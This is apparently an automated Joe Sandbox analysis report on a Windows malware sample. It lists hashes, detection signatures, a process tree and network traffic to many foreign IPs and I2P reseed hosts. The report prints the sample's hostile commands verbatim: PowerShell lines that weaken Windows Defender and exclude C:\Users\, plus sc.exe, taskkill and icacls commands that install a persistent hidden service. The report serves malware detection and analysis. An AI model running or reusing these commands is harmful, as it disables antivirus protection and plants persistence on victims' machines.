Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532228
MD5:d2ecf5f2a271da094867f6dc31b3d60e
SHA1:b8b7ec24a5c6f1a0ad96e989003516b656256d2e
SHA256:99a5de18c71cfd7fd32d3f2b5bf4a60a4b2aa41f9bdbafa042693375927d11b1
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to create new users
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • file.exe (PID: 2644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D2ECF5F2A271DA094867F6DC31B3D60E)
  • file.exe (PID: 5356 cmdline: C:\Users\user\Desktop\file.exe MD5: D2ECF5F2A271DA094867F6DC31B3D60E)
    • cmd.exe (PID: 5720 cmdline: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4616 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 2144 cmdline: powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 4620 cmdline: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • f8ff311483bvmdq2bvv.exe (PID: 5772 cmdline: "C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe" MD5: 319865D78CC8DF6270E27521B8182BFF)
    • 31yd7ynpdj6jw5vl4xn9qyj7u.exe (PID: 3416 cmdline: "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe" MD5: 7D1755E8E41A6C2F08D2FAEFFDF9DAD1)
      • taskkill.exe (PID: 5588 cmdline: taskkill.exe /F /FI "SERVICES eq RDP-Controller" MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1916 cmdline: sc.exe stop RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5664 cmdline: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4548 cmdline: sc.exe failure RDP-Controller reset= 1 actions= restart/10000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4620 cmdline: sc.exe start RDP-Controller MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 5200 cmdline: icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18 MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 2156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • icacls.exe (PID: 4952 cmdline: icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl MD5: 48C87E3B3003A2413D6399EA77707F5D)
        • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • main.exe (PID: 5252 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)
    • WerFault.exe (PID: 5832 cmdline: C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 5292 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7148 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 5092 cmdline: C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • WerFault.exe (PID: 5968 cmdline: C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • main.exe (PID: 5164 cmdline: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe MD5: 4E320E2F46342D6D4657D2ADBF1F22D0)
    • WerFault.exe (PID: 5552 cmdline: C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, NewProcessName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, OriginalFileName: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5092, ProcessCommandLine: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, ProcessId: 5252, ProcessName: main.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 144.172.118.154, DestinationIsIpv6: false, DestinationPort: 7777, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 5252, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 18608
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5720, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 4616, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe, ParentProcessId: 3416, ParentProcessName: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 5664, ProcessName: sc.exe
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 95.216.2.172, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe, Initiated: true, ProcessId: 5252, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49798
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5720, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'", ProcessId: 4620, ProcessName: powershell.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe, ParentProcessId: 3416, ParentProcessName: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, ProcessCommandLine: sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore, ProcessId: 5664, ProcessName: sc.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5720, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend", ProcessId: 4616, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager, ProcessId: 5292, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeReversingLabs: Detection: 41%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exeFile created: C:\Users\user\AppData\Local\Temp\installer.logJump to behavior
Source: Binary string: RfxVmt.pdb source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, LL369bff.24.dr
Source: Binary string: RfxVmt.pdbGCTL source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmp, LL369bff.24.dr
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5576DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,24_2_00007FFDA5576DA3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5576D5F NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,24_2_00007FFDA5576D5F
Source: C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exeCode function: 6_2_00007FF66EBA3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,6_2_00007FF66EBA3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FF70CAD47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FF70CAD47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA557A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDA557A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55A1883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDA55A1883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA55D5BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDA55D5BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5BA57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDA5BA57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC0F5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDAC0F5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDAC122FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,24_2_00007FFDAC122FE3

Networking

barindex
Source: global trafficTCP traffic: 217.25.231.221 ports 39481,1,3,4,8,9
Source: global trafficTCP traffic: 73.241.223.246 ports 26731,1,2,3,6,7
Source: 31yd7ynpdj6jw5vl4xn9qyj7u.exe, 0000000B.00000002.2383577490.00007FF7A76CE000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000018.00000002.2876686721.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000018.00000002.2875167256.0000021B16BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000018.00000002.2875167256.0000021B16C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000018.00000002.2874424434.0000021B16782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exeString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,ht
Source: main.exe, 00000022.00000002.3266422424.000002204C8ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000022.00000002.3267266152.00007FFD943A4000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://reseed2.i2p.net/,https://reseed.diva.exchange/,https://reseed-fr.i2pd.xyz/,https://reseed.memcpy.io/,https://reseed.onion.im/,https://i2pseed.creativecowpat.net:8443/,https://reseed.i2pgit.org/,https://banana.incognet.io/,https://reseed-pl.i2pd.xyz/,https://www2.mk16.de/,https://i2p.ghativega.in/,https://i2p.novg.net/,https://reseed.stormycloud.org/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000022.00000002.3266422424.000002204C94E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/$
Source: f8ff311483bvmdq2bvv.exe.1.drStatic PE information: Found NDIS imports: FwpmuserClose0, FwpmuserOpen0, FwpmFilterAdd0, FwpmFilterDeleteByKey0, FwpmFreeMemory0, FwpmProviderAdd0, FwpmProviderCreateEnumHandle0, FwpmProviderDestroyEnumHandle0, FwpmProviderEnum0
Source: unknownNetwork traffic detected: IP country count 14
Source: global trafficTCP traffic: 192.168.2.6:49710 -> 146.70.24.213:1126
Source: global trafficTCP traffic: 192.168.2.6:49995 -> 89.215.190.170:12167
Source: global trafficTCP traffic: 192.168.2.6:49996 -> 40.134.93.123:9495
Source: global trafficTCP traffic: 192.168.2.6:49997 -> 217.25.231.221:39481
Source: global trafficTCP traffic: 192.168.2.6:49998 -> 46.17.106.104:20235
Source: global trafficTCP traffic: 192.168.2.6:49999 -> 73.241.223.246:26731
Source: global trafficTCP traffic: 192.168.2.6:50011 -> 186.128.148.177:11722
Source: global trafficTCP traffic: 192.168.2.6:50012 -> 174.3.142.31:14150
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 81.110.100.190:15159
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 84.229.124.109:23113
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 64.99.192.91:32790
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 79.142.69.160:7843
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 217.233.45.79:23566
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 173.44.49.91:21921
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 144.172.118.154:7777
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 94.180.147.148:28993
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 51.77.214.98:17376
Source: global trafficUDP traffic: 192.168.2.6:18608 -> 129.159.76.100:6969
Source: global trafficUDP traffic: 192.168.2.6:10070 -> 195.16.22.143:27140
Source: global trafficUDP traffic: 192.168.2.6:10070 -> 5.74.117.69:14003
Source: global trafficUDP traffic: 192.168.2.6:10070 -> 185.82.126.58:4567
Source: global trafficUDP traffic: 192.168.2.6:10070 -> 151.242.162.160:15037
Source: global trafficUDP traffic: 192.168.2.6:10070 -> 38.143.66.87:28511
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: unknownTCP traffic detected without corresponding DNS query: 146.70.24.213
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 24_2_00007FFDA5575EEA recv,WSAGetLastError,24_2_00007FFDA5575EEA
Source: global trafficHTTP traffic detected: GET https://reseed.memcpy.io:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed.stormycloud.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficHTTP traffic detected: GET https://reseed.stormycloud.org:443/i2pseeds.su3 HTTP/1.0User-Agent: Wget/1.11.4Connection: close
Source: global trafficDNS traffic detected: DNS query: reseed.memcpy.io
Source: global trafficDNS traffic detected: DNS query: reseed.stormycloud.org
